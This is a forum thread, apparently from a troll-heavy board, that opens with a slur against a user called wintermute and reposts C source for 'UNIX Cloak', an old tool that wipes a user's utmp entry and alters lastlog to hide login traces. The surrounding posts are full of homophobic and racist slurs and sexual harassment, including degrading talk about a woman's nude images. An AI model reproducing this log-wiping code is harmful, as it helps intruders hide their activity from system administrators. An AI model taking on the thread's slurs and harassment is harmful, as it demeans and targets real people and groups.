User Controls

Hey wintermute you’re a faggot

  1. #1
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    That’s the second time you gave me the same shitty mark
  2. #2
    POLECAT POLECAT is a motherfucking ferret [my presentably immunised ammonification]
    she will peg u nigga
  3. #3
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    step bitch am ready 4 iit
  4. #4
    Speedy Parker Black Hole [my absentmindedly lachrymatory gazania]
    -------START-------

    /* UNIX Cloak v1.0 (beta) Written by: Wintermute of -Resist- */
    /* This file totally wipes all presence of you on a UNIX system*/
    /* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
    /* is compatible.. This file is for information purposes ONLY!*/

    /*--> Begin source... */
    #include <fcntl.h>
    #include <utmp.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <lastlog.h>

    main(argc, argv)
    int argc;
    char *argv[];
    {
    char *name;
    struct utmp u;
    struct lastlog l;
    int fd;
    int i = 0;
    int done = 0;
    int size;

    if (argc != 1) {
    if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
    printf("You are now cloaked\n");
    goto start;
    }
    else {
    printf("close successful\n");
    exit(0);
    }
    }
    else {
    printf("usage: close [file to close]\n");
    exit(1);
    }
    start:
    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);

    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
    perror("/etc/utmp");
    else {
    while ((read(fd, &u, size) == size) && !done) {
    if (!strcmp(u.ut_line, name)) {
    done = 1;
    memset(&u, 0, size);
    lseek(fd, -1*size, SEEK_CUR);
    write(fd, &u, size);
    close(fd);
    }
    }
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
    perror("/var/adm/lastlog");
    else {
    lseek(fd, size*getuid(), SEEK_SET);
    read(fd, &l, size);
    l.ll_time = 0;
    strncpy(l.ll_line, "ttyq2 ", 5);
    gethostname(l.ll_host, 16);
    lseek(fd, size*getuid(), SEEK_SET);
    close(fd);
    }
    }



    -----END-----
  5. #5
    aldra JIDF Controlled Opposition
    that's got to be pretty old
  6. #6
    Speedy Parker Black Hole [my absentmindedly lachrymatory gazania]
    Originally posted by aldra that's got to be pretty old

    About 2004 or so
  7. #7
    Donald Trump Black Hole
    Hard mode: What are the odds of a bash script running between different linux installs?

    Nightmare mode: Over 20 years.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. #8
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    Same fucking mark again I give up
  9. #9
    Kev Space Nigga
    Originally posted by Speedy Parker About 2004 or so

    wintermute was a fat ugly cunt of a shedevil in 2004, cant imagine the mess she looks like now.

    her nudes were revolting, its the only time i wished i left my moms child f'ilter app running.
  10. #10
    Sophie Pedophile Tech Support
    Originally posted by Donald Trump Hard mode: What are the odds of a bash script running between different linux installs?

    Nightmare mode: Over 20 years.

    Actually pretty good. Especially since you can fall back to Sh from Bash, which is POSIX compliant and standardized.
Jump to Top